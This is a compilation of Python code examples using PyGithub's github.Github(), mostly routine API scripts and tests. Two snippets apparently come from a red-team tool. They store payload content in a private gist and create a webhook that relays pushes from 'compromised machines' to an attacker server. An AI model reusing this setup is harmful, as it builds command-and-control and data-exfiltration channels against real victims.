我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用github.Github()。
def main():
    """Print every repository starred by a GitHub user.

    The user is taken from ``-u/--username`` (default ``GITHUB_USERNAME``).
    The API session itself always logs in with ``GITHUB_USERNAME`` and
    ``GITHUB_PASS``.
    """
    cli = ArgumentParser(description="Show a user's Github stars")
    cli.add_argument(
        '-u', '--username',
        help='Github Username',
        type=str,
        default=GITHUB_USERNAME,
    )
    options = cli.parse_args()

    client = Github(GITHUB_USERNAME, GITHUB_PASS)
    line = u"{} ({}) @ {}"
    for starred in client.get_user(options.username).get_starred():
        print(line.format(starred.full_name, starred.description, starred.html_url))
def search(self, query):
    """Search repositories for *query* and dump stargazer rows to JSON.

    One row is produced per (repository, language, stargazer) combination,
    holding ``repo_id``, ``language_id``, ``stargazer_id`` and
    ``time_value``. The rows are written, sorted by key and indented, to
    the path returned by ``self.get_path("json_input.json")``.
    """
    gh = Github(self.token)
    rows = []
    for repo in gh.search_repositories(query, sort='stars'):
        languages = repo.get_languages().keys()
        stargazers = repo.get_stargazers_with_dates()
        for lang in languages:
            for stargazer in stargazers:
                # A fresh dict per row: appending one shared dict would make
                # every row of a repository alias the same object and show
                # only the last values written.
                rows.append({
                    "repo_id": repo.id,
                    "language_id": lang,
                    "stargazer_id": stargazer.user.id,
                    # NOTE(review): "%H:%S" is hours:seconds; minutes are
                    # never emitted. Left unchanged because consumers of the
                    # file may rely on this format - confirm intent.
                    "time_value": stargazer.starred_at.strftime("%Y-%m-%dT%H:%S"),
                })

    # Open the file only once the data is complete, and let the context
    # manager flush and close the handle.
    with open(self.get_path("json_input.json"), "w") as json_input:
        json_input.write(json.dumps(rows, indent=4, sort_keys=True))
def create_private_gist(config, main_github_token, filename, content, description):
    """Create a non-public gist with one file and record its raw URL.

    The shortened raw URL is stored under ``config["gist_raw_contents_url"]``
    and printed; *config* is returned.
    """
    account = Github(main_github_token).get_user()
    gist = account.create_gist(False, {filename: github.InputFileContent(content)}, description)

    # gist.files = {'filename': GistFile(filename), ...}; only one file was
    # uploaded, so the first value is the one we want.
    only_file = list(gist.files.values())[0]
    config["gist_raw_contents_url"] = only_file.raw_url

    # The structure of the url is:
    #   https://gist.githubusercontent.com/<username>/<gist guid>/raw/<file guid>/<filename.txt>
    #
    # With a single file, everything after /raw/ can be trimmed off and the
    # URL still serves the content, which keeps it as concise as possible.
    prefix = config["gist_raw_contents_url"].split("/raw/")[0]
    config["gist_raw_contents_url"] = prefix + "/raw"

    print("[*] Private gist content at:")
    print("- %s" % config["gist_raw_contents_url"])
    return config

# Return the content that will placed in the private gist
def create_c2_webhook(config):
    """Create the push webhook on the configured repo and return its secret.

    Reads ``main_github_token``, ``github_c2_repo_name`` and
    ``attacker_server`` from *config*. If creating the hook fails, the
    first existing hook of the repository is edited instead: a freshly
    generated secret is added when the hook has none, otherwise the user is
    prompted for the existing secret.

    Returns the secret string that ends up configured on the hook.
    Errors raised while repairing an existing hook propagate to the caller.
    """
    print("[*] Creating GitHub webhook for C2 repo that will receive pushes from compromised machines ")

    g = Github(config["main_github_token"])
    g_user = g.get_user()
    repo = g_user.get_repo(config["github_c2_repo_name"])

    # this endpoint is defined in server/gitpwnd/controllers.py
    webhook_endpoint = config["attacker_server"] + "/api/repo/receive_branch"

    # We're using a self-signed cert, so we need to turn off TLS verification for now :(
    # See the following for details: https://developer.github.com/v3/repos/hooks/#create-a-hook
    hook_secret = str(uuid.uuid4())
    params = {"url": webhook_endpoint, "content_type": "json", "secret": hook_secret, "insecure_ssl": "1"}

    # PyGithub's create_hook doc:
    # http://pygithub.readthedocs.io/en/latest/github_objects/Repository.html?highlight=create_hook
    try:
        repo.create_hook("web", params, ["push"], True)
    except Exception:
        # `Exception` rather than a bare except, so Ctrl-C / SystemExit are
        # not mistaken for "hook already exists".
        # NOTE(review): any API failure is still treated as "already
        # exists"; narrowing to the library's exception type would be
        # stricter - confirm which one is importable in this module.
        print("[!] Web hook already exists")
        hook = repo.get_hooks()[0]
        if "secret" not in hook.config.keys():
            print("[!] Adding a secret to the hook...")
        else:
            hook_secret = input("Enter webhook secret (Github Repo > Settings > Webhooks > Edit > Inspect 'Secret' element): ")

        new_hook_config = hook.config
        new_hook_config["secret"] = hook_secret
        hook.edit(name=hook.name, config=new_hook_config)

    # Returned after the try block, not from `finally`: a `return` inside
    # `finally` would silently discard any exception raised above.
    return hook_secret

# Automatically generate a new password for the gitpwnd server
# so we don't use a default one
def __init__(self):
    """Load the client secrets file and build the GitHub client.

    The debug or production secrets file, reporter host and owner/repo pair
    are chosen by ``is_appengine_local()``.
    """
    secrets_path = DEBUG_CLIENT_SECRETS if is_appengine_local() else CLIENT_SECRETS
    with open(secrets_path, 'r') as handle:
        secrets = json.load(handle)

    github_token = secrets.get(TOKEN_KEY)
    self.webhook_secret = secrets.get(WEBHOOK_SECRET)

    if is_appengine_local():
        host, owner, repo = DEBUG_CRASH_REPORTER_HOST, DEBUG_OWNER, DEBUG_REPO
    else:
        host, owner, repo = CRASH_REPORTER_HOST, OWNER, REPO
    self.reporter_host = host
    self.repo_name = '{0}/{1}'.format(owner, repo)

    self.github_client = Github(login_or_token=github_token)
def __init__(self, config, agentid, issue):
    """Bind this object to one GitHub issue.

    Settings are read from ``config.github()``. The authenticated user, the
    repository and the issue numbered *issue* are resolved immediately.
    """
    self.config, self.agentid, self.issue = config, agentid, issue
    # logging.debug(yaml.dump(config))

    # Settings from the GitHub section of the configuration.
    self.ghuser_name = config.github()['git_user_name']
    self.ghtoken = config.github()['git_app_token']
    self.ghrepo_name = config.github()['git_repo_name']
    self.gh_rlimit = config.github()['git_rlimit']
    self.ghcomm_limit = config.github()['git_comm_limit']

    # API objects, resolved from client down to the issue.
    self.gh = Github(self.ghuser_name, self.ghtoken)
    self.ghuser = self.gh.get_user()
    self.ghrepo = self.ghuser.get_repo(self.ghrepo_name)
    self.ghissue = self.ghrepo.get_issue(self.issue)
def update_organisation_repos(organisation, token, filename, excludes, include_forks):
    """Write the clone URLs of an organisation's public repos to *filename*.

    Forks are dropped unless *include_forks* is true. The remaining URLs
    are passed through ``filter_excluded_repos`` with *excludes* before
    being written. Progress messages go through ``printerr``.
    """
    org = Github(token).get_organization(organisation)
    printerr("Looking up {org} repositories (may take some time)".format(org=organisation))

    candidates = org.get_repos("public")
    if not include_forks:
        candidates = (candidate for candidate in candidates if not candidate.fork)

    wanted = filter_excluded_repos(_clone_urls(candidates), excludes)
    with open(filename, "w") as out:
        _write_repo_list(wanted, out)

    printerr("Wrote list of repositories to {location}".format(location=filename))
def get_repository():
    """Return the repository named in ``app_settings.GITHUB_REPO``.

    The repository is looked up under ``app_settings.GITHUB_ORG`` when that
    is set, otherwise under the authenticated user. If it does not exist it
    is created. Returns ``None`` (after logging the exception) when a
    ``GithubException`` is raised.
    """
    try:
        client = Github(**get_github_credentials())
        org_name = app_settings.GITHUB_ORG
        owner = client.get_organization(org_name) if org_name else client.get_user()
        try:
            return owner.get_repo(app_settings.GITHUB_REPO)
        except UnknownObjectException:
            logging.info("Creating repository {}".format(app_settings.GITHUB_REPO))
            return owner.create_repo(app_settings.GITHUB_REPO)
    except GithubException:
        logging.exception("Unable to configure Github connection.")
    return None
def __init__(self, config, assets):
    """Set up the 'Upload the release' step and its two substeps."""
    # Params
    self.config = config
    self.assets = assets
    self.newassets = []

    # Github API handles all start unset.
    self.github = self.githubuser = self.githubrepo = self.release = None

    # Initialize parent
    https_substep = Substep('Configure HTTPS download server', self.substep1)
    upload_substep = Substep('Upload to Github', self.substep2)
    Step.__init__(self, 'Upload the release', https_substep, upload_substep)
def substep2(self):
    """Upload to Github.

    Creates the release from the configured tag when ``self.release`` is
    still ``None``, then uploads every entry of ``self.newassets`` from the
    configured output directory.
    """
    cfg = self.config

    # Create release if not existent
    if self.release is None:
        title = cfg['project'] + ' ' + cfg['tag']
        self.release = self.githubrepo.create_git_release(
            cfg['tag'],
            title,
            cfg['message'],
            draft=False,
            prerelease=cfg['prerelease'])

    # Upload assets
    for name in self.newassets:
        assetpath = os.path.join(self.config['output'], name)
        self.verbose('Uploading {}'.format(assetpath))
        # TODO not functional
        # see https://github.com/PyGithub/PyGithub/pull/525#issuecomment-301132357
        self.release.upload_asset(assetpath)
def create_or_update_comment(self, message):
    """Post *message* on the pull request, reusing the existing comment.

    Nothing happens when *message* is empty or when the existing comment
    already has exactly this body. An existing comment with a different
    body is edited in place; otherwise a new issue comment is created.

    :param message: The comment body to publish
    """
    # see: https://github.com/blog/2178-multiple-assignees-on-issues-and-pull-requests
    # see: https://github.com/PyGithub/PyGithub/issues/404
    if not message:
        return

    current = self._get_existing_comment()
    if not current:
        self._pr.create_issue_comment(message)
    elif current.body != message:
        current.edit(message)
def __init__(self, index='codetoname', page_num=0, page_size=30, language='python', account=None, password=None):
    """Set up the Elasticsearch and GitHub clients and start the first search.

    The GitHub client is authenticated (and the account's name printed)
    only when both *account* and *password* are given; otherwise an
    anonymous client is used. *page_size* is also passed to the GitHub
    client as ``per_page``.
    """
    # Search/index settings.
    self._es = elasticsearch.Elasticsearch()
    self._es_index = index
    self._page_num = page_num
    self._page_size = page_size
    self._language = language
    self._total_page_num = 0

    # GitHub client.
    if account and password:
        self._github_client = github.Github(account, password, per_page=page_size)
        print('Hi, {}'.format(self._github_client.get_user().name))
    else:
        self._github_client = github.Github(per_page=page_size)

    # Search state.
    self._github_response = None
    self._latest_repo_updated = None
    self._latest_repo_index = False
    self._update_searching_response()
async def test__when_comment_data_is_valid__should_send_it_to_proper_github_endpoint(self):
    """Valid comment data is forwarded to the commit and answered with 200.

    Declared ``async`` because the body awaits the handler; ``await`` is a
    syntax error inside a plain ``def``.
    """
    proper_data = {'repository': 'repo', 'sha': '123abc', 'body': 'Comment body', 'jobName': 'job'}

    request = mock({'headers': {'Authorization': f'Token {self.API_TOKEN}'}}, spec=aiohttp.web_request.Request)
    github_client = mock(spec=github.Github)
    github_repository = mock(spec=github.Repository)
    github_commit = mock(spec=github.Commit)

    pipeline_controller = PipelineController(github_client, mock(), self.API_TOKEN)

    # given
    when(request).json().thenReturn(async_value(proper_data))
    when(CommentRequestData).is_valid_comment_data(proper_data).thenReturn(True)
    when(github_client).get_repo('repo').thenReturn(github_repository)
    when(github_repository).get_commit('123abc').thenReturn(github_commit)
    when(github_commit).create_comment(body='job\nComments: Comment body')

    # when
    response: aiohttp.web.Response = await pipeline_controller.handle_comment(request)

    # then
    assert response.status == 200
    assert response.text == 'Comment ACK'
async def test__when_status_data_is_ok__should_call_github_client_to_create_status(self):
    """Valid status data creates a commit status and is answered with 200.

    Declared ``async`` because the body awaits the handler; ``await`` is a
    syntax error inside a plain ``def``.
    """
    proper_data = {'repository': 'repo', 'sha': '123abc', 'state': 'State',
                   'description': 'Description', 'context': 'Context', 'url': 'pr_url'}

    request = mock({'headers': {'Authorization': f'Token {self.API_TOKEN}'}}, spec=aiohttp.web_request.Request, strict=True)
    github_client = mock(spec=github.Github, strict=True)
    github_repository = mock(spec=github.Repository, strict=True)
    github_commit = mock(spec=github.Commit, strict=True)

    pipeline_controller = PipelineController(github_client, mock(), self.API_TOKEN)

    # given
    when(request).json().thenReturn(async_value(proper_data))
    when(StatusRequestData).is_valid_status_data(proper_data).thenReturn(True)
    when(github_client).get_repo('repo').thenReturn(github_repository)
    when(github_repository).get_commit('123abc').thenReturn(github_commit)
    when(github_commit).create_status(state='State', description='Description', target_url='pr_url', context='Context')

    # when
    response: aiohttp.web.Response = await pipeline_controller.handle_status(request)

    # then
    assert response.status == 200
    assert response.text == 'Status ACK'
async def test__when_github_entity_is_not_found__comment_should_return_404_response_with_github_explanation(self):
    """A 404 ``GithubException`` from ``get_commit`` yields a 404 response.

    Declared ``async`` because the body awaits the handler; ``await`` is a
    syntax error inside a plain ``def``.
    """
    parameters = {'repository': 'repo', 'sha': 'null', 'body': 'Comment body', 'jobName': 'job'}

    request = mock({'headers': {'Authorization': f'Token {self.API_TOKEN}'}}, spec=aiohttp.web_request.Request, strict=True)
    github_client = mock(spec=github.Github, strict=True)
    github_repository = mock(spec=github.Repository, strict=True)

    pipeline_controller = PipelineController(github_client, mock(), self.API_TOKEN)

    # given
    when(request).json().thenReturn(async_value(parameters))
    when(CommentRequestData).is_valid_comment_data(parameters).thenReturn(True)
    when(github_client).get_repo('repo').thenReturn(github_repository)
    github_exception_data = {'message': 'Not Found', 'documentation_url': 'https://developer.github.com/v3/'}
    when(github_repository).get_commit('null').thenRaise(github.GithubException(404, github_exception_data))

    # when
    response: aiohttp.web.Response = await pipeline_controller.handle_comment(request)

    # then
    assert response.status == 404
    assert response.reason == str(github_exception_data)
async def test__when_setting_pr_sync_label__if_github_raises_more_then_3_times__timeout_error_should_be_raised(self):
    """Repeated GitHub failures end in ``TriggearTimeoutError``.

    Declared ``async`` because the body awaits the controller; ``await`` is
    a syntax error inside a plain ``def``.
    """
    github_client: github.Github = mock(spec=github.Github, strict=True)
    github_controller = GithubController(github_client, mock(), mock(), mock())
    github_repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True)
    mock(spec=asyncio)

    # when
    when(github_client).get_repo('repo')\
        .thenRaise(github.GithubException(404, 'repo not found'))\
        .thenRaise(github.GithubException(404, 'repo not found'))\
        .thenReturn(github_repository)
    when(github_repository).get_issue(43)\
        .thenRaise(github.GithubException(404, 'repo not found'))
    when(asyncio).sleep(1)\
        .thenReturn(async_value(None))\
        .thenReturn(async_value(None))\
        .thenReturn(async_value(None))

    # then
    with pytest.raises(TriggearTimeoutError) as timeout_error:
        await github_controller.set_pr_sync_label_with_retry('repo', 43)
    # Checked after the `with` block: statements following the raising call
    # inside it would never run.
    assert str(timeout_error.value) == 'Failed to set label on PR #43 in repo repo after 3 retries'
async def test__when_setting_pr_sync_label__if_github_returns_proper_objects__pr_sync_label_should_be_set(self):
    """The sync label is added exactly once when GitHub answers normally.

    Declared ``async`` because the body awaits the controller; ``await`` is
    a syntax error inside a plain ``def``.
    """
    github_client: github.Github = mock(spec=github.Github, strict=True)
    github_controller = GithubController(github_client, mock(), mock(), mock())
    github_repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True)
    github_issue: github.Issue.Issue = mock(spec=github.Issue.Issue, strict=True)

    # given
    when(github_client).get_repo('repo')\
        .thenReturn(github_repository)
    when(github_repository).get_issue(43)\
        .thenReturn(github_issue)
    expect(github_issue, times=1)\
        .add_to_labels('triggear-pr-sync')

    # when
    result = await github_controller.set_pr_sync_label_with_retry('repo', 43)

    # then
    assert result is None
def test__when_get_repo_labels_is_called__only_label_names_are_returned(self):
    """``get_repo_labels`` returns the label names, not the label objects."""
    github_client: github.Github = mock(spec=github.Github, strict=True)
    github_controller = GithubController(github_client, mock(), mock(), mock())
    github_repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True)
    label: github.Label.Label = mock({'name': 'label'}, spec=github.Label.Label, strict=True)
    other_label: github.Label.Label = mock({'name': 'other_label'}, spec=github.Label.Label, strict=True)

    # given
    when(github_client).get_repo('repo').thenReturn(github_repository)
    when(github_repository).get_labels().thenReturn([label, other_label])

    # when
    result: List[str] = github_controller.get_repo_labels('repo')

    # then
    assert result == ['label', 'other_label']
def test__get_pr_labels__should_return_only_label_names(self):
    """``get_pr_labels`` returns the names of the labels on the issue."""
    github_client: github.Github = mock(spec=github.Github, strict=True)
    github_controller = GithubController(github_client, mock(), mock(), mock())
    github_repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True)
    label: github.Label.Label = mock({'name': 'label'}, spec=github.Label.Label, strict=True)
    other_label: github.Label.Label = mock({'name': 'other_label'}, spec=github.Label.Label, strict=True)
    github_issue: github.Issue.Issue = mock({'labels': [label, other_label]}, spec=github.Issue.Issue, strict=True)

    # Stub the lookup chain: client -> repository -> issue #25.
    when(github_client).get_repo('repo').thenReturn(github_repository)
    when(github_repository).get_issue(25).thenReturn(github_issue)

    labels: List[str] = github_controller.get_pr_labels('repo', 25)

    assert ['label', 'other_label'] == labels
def main():
    """Print the closed issues of one UNINETT/nav milestone, by issue number.

    The milestone whose title equals the ``version`` argument is used. If
    none matches, a message is written to stderr and the process exits with
    status 1. ``--token/-t`` selects authenticated API access.
    """
    cli = ArgumentParser(description=__doc__)
    cli.add_argument("version")
    cli.add_argument("--token", "-t", type=str, help="GitHub API token to use")
    options = cli.parse_args()

    hub = Github(options.token) if options.token else Github()
    repo = hub.get_user('UNINETT').get_repo('nav')

    matching = [m for m in repo.get_milestones(state='all') if m.title == options.version]
    if not matching:
        print("Couldn't find milestone for {}".format(options.version), file=sys.stderr)
        sys.exit(1)
    mstone = matching[0]

    closed = repo.get_issues(state='closed', milestone=mstone)
    for issue in sorted(closed, key=operator.attrgetter('number')):
        print(format_issue(issue).encode('utf-8'))
def get_orgs(intent, session):
    """Build the spoken response listing the user's organizations.

    Each organization is named by the last path segment of its API URL.
    The session is always ended and no reprompt is given.
    """
    session_attributes = {}
    reprompt_text = None
    should_end_session = True

    client = Github(session['user']['accessToken'])
    org_names = [org.url[org.url.rfind('/') + 1:] for org in client.get_user().get_orgs()]

    if len(org_names) > 0:
        speech_output = 'You belong to these organizations. ' + ','.join(org_names)
    else:
        speech_output = "You don't have any organizations in this account."

    speechlet = build_speechlet_response(
        intent['name'], speech_output, reprompt_text, should_end_session)
    return build_response(session_attributes, speechlet)
def merge_pr(intent, session, dialog_state):
    """Merge the pull request named by the filled slots and report the result.

    While slot collection is still in progress (``delegate_slot_collection``
    returns something other than *intent*), that value is returned
    unchanged. Otherwise the ``REPONAME`` and ``PRNUMBER`` slot values
    select the pull request, which is merged when GitHub reports it as
    mergeable.

    Raises ``ValueError`` if the ``PRNUMBER`` slot value is not an integer.
    """
    filled_slots = delegate_slot_collection(intent, dialog_state)
    if intent != filled_slots:
        return filled_slots

    session_attributes = {}
    reprompt_text = None
    should_end_session = True

    repo_name = filled_slots['REPONAME']['value']
    pr_number = filled_slots['PRNUMBER']['value']

    g = Github(session['user']['accessToken'])
    repo = g.get_repo(repo_name)
    # The slot value is text, while get_pull expects an integer number.
    pr = repo.get_pull(int(pr_number))

    # `mergeable` is an attribute on PyGithub pull requests (it may be None
    # while GitHub is still computing it); there is no `mergable()` method.
    if pr.mergeable:
        pr.merge()
        speech_output = 'pull request ' + pr_number + ' merged.'
    else:
        speech_output = 'pull request ' + pr_number + ' cannot be merged.'

    return build_response(session_attributes, build_speechlet_response(
        intent['name'], speech_output, reprompt_text, should_end_session))
def __init__(self):
    """Create ``self.api`` from the credentials in ``github.conf``.

    The ``DEFAULT`` section must provide ``username``, ``password`` and
    ``token`` options. A non-empty token takes precedence over
    username/password.

    Raises ``LookupError`` when both username and token are empty.
    """
    parser = configparser.ConfigParser()
    parser.read("github.conf")

    username = parser.get("DEFAULT", "username")
    password = parser.get("DEFAULT", "password")
    token = parser.get("DEFAULT", "token")

    if not (username or token):
        logger.error("Username and Token is not filled in github.conf file. Please input login data.")
        raise LookupError("github.conf is not properly filled.")

    self.api = Github(token) if token else Github(username, password)
def main(argv=None, test=False):
    """Create a commit status on GitHub from docopt command-line options.

    Authentication uses ``--token`` when given, otherwise ``--username``
    with ``--password``.

    Returns the created status object when *test* is true, else ``None``.
    Raises ``ValueError`` when no usable credentials were supplied.
    """
    arguments = docopt(__doc__, argv=argv)

    status = arguments['--status']
    commit = arguments['--commit-hash']
    user = arguments['--username']
    password = arguments['--password']
    token = arguments['--token']
    url = arguments['--url']
    repo = arguments['--repo']
    context = arguments['--context']
    description = arguments['--description']

    # One parenthesised argument prints identically as a Python 2 print
    # statement and as a Python 3 function call.
    print("Setting status %s for commit %s." % (status, commit))

    if token:
        g = Github(token)
    elif user and password:
        g = Github(user, password)
    else:
        # Without this branch `g` is unbound and the next line fails with
        # an unhelpful UnboundLocalError.
        raise ValueError("Either --token or both --username and --password must be given.")

    r = g.get_repo(repo)
    c = r.get_commit(commit)
    s = c.create_status(status, target_url=url, description=description, context=context)

    if test:
        return s
def main(argv=None, test=False):
    """Open a pull request from ``--head`` into ``--base`` in ``--repo``.

    An empty title or description is replaced by a fixed placeholder text.
    Returns the created pull request when *test* is true, else ``None``.
    """
    options = docopt(__doc__, argv=argv)

    head = options['--head']
    base = options['--base']
    token = options['--token']
    repo = options['--repo']
    title = options['--title'] or "Auto-generated pull request."
    description = options['--description'] or "Auto-generated pull request."

    print("Pulling %s into %s in repo %s." % (head, base, repo))

    pull = Github(token).get_repo(repo).create_pull(
        head=head, base=base, title=title, body=description)

    if test:
        return pull
def _batch_worker(queue_input, queue_output):
    """Classify queued items with every classifier until the input runs dry.

    For each item a tuple ``(data, best_class, averaged_results,
    per_classifier_results)`` is put on *queue_output*. The process exits
    with status 0 once ``queue_input.get`` times out after one second.
    """
    all_classifiers = classifier.get_all_classifiers()
    try:
        while True:
            item = queue_input.get(True, 1)
            averaged = utility.get_zero_class_dict()
            per_classifier = dict()
            for clf in all_classifiers:
                scores = clf.classify(item)
                per_classifier[clf.name()] = scores
                # Each classifier contributes an equal share to the average.
                for label in averaged.keys():
                    if label in scores:
                        averaged[label] += scores[label] / len(all_classifiers)
            best = utility.get_best_class(averaged)
            queue_output.put((item, best, averaged, per_classifier))
    except queue.Empty:
        sys.exit(0)

##
# \brief Learning worker for parallel processing.
#
# \param input List containing tuples (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and
#              CLASS is the class label of the repository as a string.
# \param queue_classifier multiprocessing.Queue containing classifier objects for learning.
def result_to_file(result, filename):
    """Write one ``<repository url> <class>`` line per result to *filename*.

    Each entry of *result* is indexed as ``entry[0]`` (an object providing
    ``get_repo_url()``) and ``entry[1]`` (the value written after the URL).
    Saving is best-effort: ordinary errors are logged, not raised.
    """
    try:
        with open(filename, 'w') as out:
            for entry in result:
                out.write('{} {}\n'.format(entry[0].get_repo_url(), entry[1]))
    except Exception:
        # `Exception` rather than a bare except, so KeyboardInterrupt and
        # SystemExit still stop the program.
        logging.error('Can not save results to {}'.format(filename))

##
# \brief Parsed the files in a directory and returns input for learning.
#
# The directory has to contain one file with the name of each class ('DEV', 'HW', 'EDU', 'DOCS', 'WEB', 'DATA', 'OTHER')
# containing lines with repositories of that class.
#
# \param path Path to directory.
# \return List containing tuples (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and
#         CLASS is the class label of the repository as a string.
def _get_input(self, github_object):
    """Return the ten metadata features of a repository as a list.

    The second feature is ``True`` exactly when the repository's homepage
    is not ``None``. If ``github.GithubError`` is raised, a list of ten
    ``0.0`` values is returned instead.
    """
    try:
        meta = github_object.get_repository_data()
        return [
            meta['fork'],
            meta['homepage'] is not None,
            meta['size'],
            meta['stargazers_count'],
            meta['watchers_count'],
            meta['has_wiki'],
            meta['has_pages'],
            meta['forks_count'],
            meta['open_issues_count'],
            meta['subscribers_count'],
        ]
    except github.GithubError:
        return [0.0] * 10

##
# \brief Classifies the repository based on the learned <em>Decision Tree</em>.
#
# \param data GitHub repository as github.Github object.
# \return Dictionary {CLASS: PROBABILITY}, where CLASS is a string containing the class label and
#         PROBABILITY is a float in [0.0, 1.0] containing the probability that the repository belongs to the class.
def classify(self, data):
    """Return the class probabilities the stored tree predicts for *data*.

    A zero class dictionary is returned (and an error logged) when the
    model has no ``version`` entry or was trained with a different
    scikit-learn version. The tree is unpickled from the model
    configuration on first use and kept on ``self._tree``.
    """
    config = self._model.config

    if 'version' not in config:
        logging.error('Trying to use MetadataClassifier without learning first')
        return utility.get_zero_class_dict()

    if config['version'] != sklearn.__version__:
        logging.error('Using MetadataClassifier with different scikit learn version (trained on: {}, used: {}) - relearn classifier first'.format(self._model.config['version'], sklearn.__version__))
        return utility.get_zero_class_dict()

    if self._tree is None:
        # NOTE(review): pickle.loads runs arbitrary code if the stored
        # model data is not trusted - confirm where the config comes from.
        self._tree = pickle.loads(base64.b64decode(config['tree']))

    probability = self._tree.predict_proba([self._get_input(data)])
    result = utility.get_zero_class_dict()
    for position, label in enumerate(self._tree.classes_):
        result[label] = probability[0][position]
    return result

##
# \brief Trains a <em>Decision Tree</em> based on the provided repositories.
#
# \param learn List containing tuples (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and
#              CLASS is the class label of the repository as a string.
def classify(self, data):
    """Return a copy of the stored class distribution for the repo's language.

    A repository without a language is looked up under the key
    ``'_None_'``. A zero class dictionary is returned when the language is
    unknown to the model or ``github.GithubError`` is raised.
    """
    try:
        language = data.get_repository_data()['language']
    except github.GithubError:
        return utility.get_zero_class_dict()

    key = '_None_' if language is None else language
    if key not in self._model.config:
        return utility.get_zero_class_dict()
    return self._model.config[key].copy()

##
# \brief Learns the distribution of the languages based on the provided repositories.
#
# \param learn List containing tuples (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and
#              CLASS is the class label of the repository as a string.
def _get_entry(self, languages, known_languages):
    """Return the share of each known language, in *known_languages* order.

    Languages missing from *languages* count as 0. The values are divided
    by their sum unless that sum is 0, in which case they are returned
    unscaled.
    """
    amounts = [languages[name] if name in languages else 0 for name in known_languages]
    total = sum(amounts)
    if total == 0:
        return amounts
    return [amount / total for amount in amounts]

##
# \brief Classifies the repository based on the learned <em>Decision Tree</em>.
#
# \param data GitHub repository as github.Github object.
# \return Dictionary {CLASS: PROBABILITY}, where CLASS is a string containing the class label and
#         PROBABILITY is a float in [0.0, 1.0] containing the probability that the repository belongs to the class.
def setUp(self):
    """Point the config at the test cache/models and build the fixtures."""
    # setup config
    configserver._CONGIF['maximum_cache_age'] = 366000  # About 1000 years
    configserver._CONGIF['cache_path'] = './tests/cache'
    configserver._CONGIF['model_path'] = './tests/models'

    self.classifier = classifier.get_all_classifiers()

    # Repositories of the 'Top-Ranger' account used as test input.
    repo_names = (
        'kana-keyboard',
        'CHI2016-SUR-datasets',
        'SPtP_learningdb',
        'SUR213',
        'bakery',
        'fooling_dnn',
        'harbour-hiragana',
        'harbour-katakana',
        'harbour-reversi',
        'qnn',
        'SPtP',
    )
    self.github_list = [github.Github('Top-Ranger', repo_name) for repo_name in repo_names]
def __init__(self, *, api_url=_DEFAULT_BASE_URL, clone_protocol="ssh", **kwargs):
    """Store the clone protocol and create the GitHub API client.

    The client authenticates with the ``GITHUB_TOKEN`` environment variable
    (``None`` when unset) against *api_url*. Remaining keyword arguments go
    to the parent initializer.
    """
    super().__init__(**kwargs)
    self._clone_protocol = self.CloneProtocol(clone_protocol)
    token = os.environ.get("GITHUB_TOKEN")
    self._gh = github.Github(login_or_token=token, base_url=api_url)
def create_pr_to_master(target_branch):
    """Create a GitHub pull request from *target_branch* into ``master``.

    Authenticates with the ``GITHUB_ACCESS_TOKEN`` environment variable and
    works on the authenticated user's ``mattermost-openshift`` repository,
    whose pulls URL is printed first.
    """
    git = Github(os.environ.get('GITHUB_ACCESS_TOKEN'))
    repo = git.get_user().get_repo('mattermost-openshift')
    print(repo.pulls_url)
    # Keyword arguments do not depend on the positional parameter order,
    # which differs between PyGithub major versions.
    repo.create_pull(
        title='automated update',
        body='This PR is generated as part of an automated update triggered by a new Mattermost release.',
        base='master',
        head=target_branch,
    )
def get_repo(token, name, org):
    """Return repository *name* of organization *org*.

    When *org* is falsy the repository is looked up under the authenticated
    user instead.
    """
    client = Github(token)
    owner = client.get_organization(org) if org else client.get_user()
    return owner.get_repo(name=name)
def handle(self):
    """Return ``True`` when ``get_today_commit_events`` finds any event."""
    client = Github(self.username, self.password)
    events = get_today_commit_events(client.get_user(self.username))
    return len(events) != 0
def get_github():
    """Return a GitHub client using the token stored in ``ghtoken.txt``.

    The file is read from the parent of this module's directory, and
    surrounding whitespace is stripped from its content.
    """
    token_path = os.path.join(os.path.dirname(__file__), "..", "ghtoken.txt")
    with open(token_path) as token_file:
        token = token_file.read().strip()
    return github.Github(token)
def get_repository(name, username=None, password=None, auth_required=False):
    """Return repository *name*, logging in with the given credentials.

    Missing credentials fall back to the ``GITHUB_USERNAME`` and
    ``GITHUB_PASSWORD`` environment variables.

    Raises ``Exit`` when *auth_required* is true and either credential is
    still missing.
    """
    username = username or os.getenv('GITHUB_USERNAME')
    password = password or os.getenv('GITHUB_PASSWORD')

    incomplete = not username or not password
    if auth_required and incomplete:
        raise Exit('Mandatory GitHub username/password not given.')

    client = Github(username, password)
    return client.get_repo(name)
def main():
    """Print the user's pushed commit messages from public events.

    Only ``PushEvent`` entries are considered. Events whose ``month(...)``
    value is greater than ``(current year, month argument)`` are skipped,
    as are repositories rejected by ``is_work_repo`` and commits whose
    lower-cased author name does not contain ``GITHUB_AUTHOR``.
    """
    cli = ArgumentParser(description="Retrieve Github activity")
    cli.add_argument('month', type=int, help='Month for activity log')
    options = cli.parse_args()

    account = Github(GITHUB_USERNAME, GITHUB_PASS).get_user(GITHUB_USERNAME)
    wanted = (datetime.now().year, int(options.month))
    row = "{0} - {1}: {2}"

    for event in account.get_public_events():
        # go back in history until the start date is reached
        if event.type != u"PushEvent" or month(event.created_at.date()) > wanted:
            continue
        # if month(event.created_at.date()) < this:
        #     break
        repo_url = event._repo.value.html_url
        if not is_work_repo(repo_url):
            continue
        repo_name = repo_url.split('/')[-1]
        for commit in event.payload['commits']:
            if GITHUB_AUTHOR in commit['author']['name'].lower():
                print(row.format(event.created_at.date(), repo_name, commit['message']))
def process(input):
    """Initialise a repo in the user config folder and push it to GitHub.

    Echoes *input*, then inits, adds, commits and pushes the folder that
    contains the user config file to the hard-coded ``.yoda`` remote.
    """
    remote_url = "https://github.com/manparvesh/.yoda"

    # The client is built from the stored credentials but not used further
    # in this function.
    gh = github.Github(setup.get_gh_username(), setup.decrypt_password())

    click.echo(chalk.blue('you are in git module'))
    click.echo('input = %s' % input)

    config_file = get_config_file_paths()['USER_CONFIG_FILE_PATH']
    config_folder = get_folder_path_from_file_path(config_file)

